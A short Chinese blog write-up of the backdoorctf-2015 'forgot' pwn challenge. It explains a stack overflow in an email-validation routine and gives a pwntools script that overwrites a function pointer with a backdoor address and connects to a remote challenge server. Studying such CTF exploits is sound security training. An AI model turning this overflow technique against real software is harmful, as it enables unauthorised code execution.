forgot

题目来源: backdoorctf-2015

题目描述:福克斯最近玩弄有限状态自动机。在探索概念实现正则表达式使用FSA他想实现一个电子邮件地址验证。 最近,Lua开始骚扰福克斯。对此,福克斯向Lua挑战斗智斗勇。福克斯承诺要奖励Lua,如果她能到不可达状态在FSA他实施过渡。可以在这里访问复制。 运行服务hack.bckdr.in:8009

 

 

这题目描述是机翻吧(

在输入要检测的字符串的时候存在着栈溢出,因此可以输入一个不含'@'的字符串,这样最终会调用v3[1],因此把v3[1]覆盖成后门函数即可

exp如下:

from pwn import *

#io = process('./forgot')
#io = gdb.debug('./forgot', 'b *0x8048A77')
io = remote('111.200.241.244', 57206)
backdoor_addr = 0x80486CC

io.recvuntil('> ')
io.sendline('a')
io.recvuntil('> ')
payload = b'a' * 36 + p32(backdoor_addr)
io.sendline(payload)

io.interactive()

 

posted @ 2021-08-16 13:42  hktk1643  阅读(256)  评论(0编辑  收藏  举报